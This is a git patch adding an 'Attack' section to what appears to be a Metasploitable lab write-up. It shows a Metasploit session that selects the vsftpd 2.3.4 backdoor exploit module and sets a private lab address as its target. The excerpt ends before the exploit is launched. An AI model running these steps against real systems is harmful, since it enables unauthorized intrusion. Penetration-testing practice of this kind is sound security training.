From 336109de5fd940cc13776c8e859cfa8af056e555 Mon Sep 17 00:00:00 2001 From: jumbo Hsieh Date: Mon, 4 Dec 2023 22:07:47 -0500 Subject: [PATCH] Update Meta.md --- Meta.md | 49 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/Meta.md b/Meta.md index 9d478ac..769b492 100644 --- a/Meta.md +++ b/Meta.md @@ -24,3 +24,52 @@ PORT STATE SERVICE VERSION 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 ``` +## Attack +``` +└─$ msfconsole -q +msf6 > search vsftpd + +Matching Modules +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service + 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution + + +Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor + +msf6 > use 1 +[*] No payload configured, defaulting to cmd/unix/interact +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101 +RHOSTS => 192.168.56.101 +msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info + + Name: VSFTPD v2.3.4 Backdoor Command Execution + Module: exploit/unix/ftp/vsftpd_234_backdoor + Platform: Unix + Arch: cmd + Privileged: Yes + License: Metasploit Framework License (BSD) + Rank: Excellent + Disclosed: 2011-07-03 + +Provided by: + hdm + MC + +Available targets: + Id Name + -- ---- + => 0 Automatic + +Check supported: + No + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOSTS 192.168.56.101 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 21 yes The target port (TCP) +```